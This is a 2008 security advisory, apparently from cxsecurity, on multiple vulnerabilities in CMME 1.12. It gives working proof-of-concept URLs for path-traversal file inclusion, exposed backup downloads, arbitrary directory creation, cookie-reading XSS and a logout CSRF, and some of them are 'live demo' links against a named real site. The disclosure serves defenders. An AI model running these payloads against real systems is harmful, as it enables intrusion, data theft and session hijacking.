Bug: CMME 1.12 (LFI/XSS/CSRF/Backup/MkDir) Multiple Vulnerabilities ( Ascii Version )

Search:
WLB2

CMME 1.12 (LFI/XSS/CSRF/Backup/MkDir) Multiple Vulnerabilities

Published
Credit
Risk
2008.09.07
SirGod
Medium
CWE
CVE
Local
Remote
CWE-79
CWE-264
CWE-352
CWE-22
CVE-2008-3923
CVE-2008-3924
CVE-2008-3925
CVE-2008-3926
No
Yes

##################################################################################################################
[+] CMME 1.12 (LFI/XSS/CSRF/Download Backup/MkDir) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
##################################################################################################################

[+] Local File Inclusion

Note : magic_quotes_gpc must be off.

Example :

http://localhost/index.php?page=weblog&env=[Local File]%00

PoC :

http://localhost/index.php?page=weblog&env=../../../autoexec.bat%00


[+] Download Backup

Example 1:

http://localhost/backup/[Backup Name].zip

PoC 1:

http://localhost/backup/cmme_data.zip

Live Demo 1:

http://cmme.oesterholt.net/backup/cmme_data.zip

Example 2:

http://localhost/backup/[Backup Name].zip

PoC 2:

http://localhost/backup/cmme_cmme.zip

Live Demo 2:

http://cmme.oesterholt.net/backup/cmme_cmme.zip


[+] Make Directory

You can make multiple directories in website root folder.

Example 1:

http://localhost/admin.php?action=login&page=home&script=index.php&env=[Directory]

PoC 1:

http://localhost/admin.php?action=login&page=home&script=index.php&env=!!!Owned!!!


Or you can make dir in previous directory,etc.

Example 2:

http://localhost/admin.php?action=login&page=home&script=index.php&env=../[Directory]

PoC 2:

http://localhost/admin.php?action=login&page=home&script=index.php&env=../!!!Owned!!!


[+] Cross Site Scripting

Example 1:

http://localhost/statistics.php?action=hstat_year&page=[XSS}&env=data

PoC 1:


http://localhost/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=d
ata

Live Demo 1:


http://cmme.oesterholt.net/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>
&env=data

Example 2:

http://localhost/statistics.php?action=hstat_year&year=[XSS]&env=data

PoC 2:


http://localhost/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=d
ata

Live Demo 2:


http://cmme.oesterholt.net/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>
&env=data


[+] Cross Site Request Forgery

If an logged in user with administrator privileges clicks the following link he will be logged out.

http://localhost/admin.php?action=logout&page=home&env=data


##################################################################################################################

References:

http://xforce.iss.net/xforce/xfdb/44685
http://www.securityfocus.com/bid/30854
http://www.milw0rm.com/exploits/6313
http://secunia.com/advisories/31599

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version